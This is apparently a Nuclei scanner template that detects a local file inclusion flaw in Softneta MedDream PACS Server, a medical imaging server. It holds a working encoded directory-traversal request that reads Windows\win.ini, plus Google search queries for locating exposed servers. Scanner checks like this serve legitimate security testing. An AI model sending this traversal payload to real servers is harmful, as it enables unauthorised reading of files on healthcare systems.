id: sofneta-mecdream-pacs-lfi

info:
  name: Softneta MedDream PACS Server Premium 6.7.1.1 - Local File Inclusion
  author: 0x_akoko
  severity: high
  description: Softneta MedDream PACS Server Premium 6.7.1.1 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/45347
    - https://www.softneta.com/products/meddream-pacs-server/downloads.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
    google-query: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
  tags: sofneta,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# digest: 4a0a00473045022019b862999d82241b9bd1f73518e735718a53532641a38dba7249376beba208ce0221009669708d3c6fe272ffb588ccc06cf086d96a8ff26a173b65745c3013924d1446:922c64590222798bb761d5b6d8e72950
